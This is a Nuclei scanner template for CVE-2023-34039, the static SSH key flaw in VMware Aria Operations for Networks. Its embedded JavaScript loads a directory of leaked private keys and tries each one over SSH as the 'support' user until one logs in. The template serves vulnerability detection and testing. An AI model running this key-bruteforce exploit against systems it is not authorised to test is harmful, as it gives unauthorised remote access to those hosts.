nuclei-templates/javascript/cves/2023/CVE-2023-34039.yaml

id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10    
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.    
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.    
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.92573
    epss-percentile: 0.98742
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: packetstorm,cve,cve2019,vmware,aria,rce
variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
javascript:
  # init field can be used to make any preperations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)      
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)      
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful      
    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response

# digest: 490a004630440220456df9f91b7d7bda27f61ae2652c2cc9f62e829e398cb921c906a38fc4a381a202205bee890d97b24387089b1080a9dce61d335c1b793571e0a63098a4b1e5126b17:922c64590222798bb761d5b6d8e72950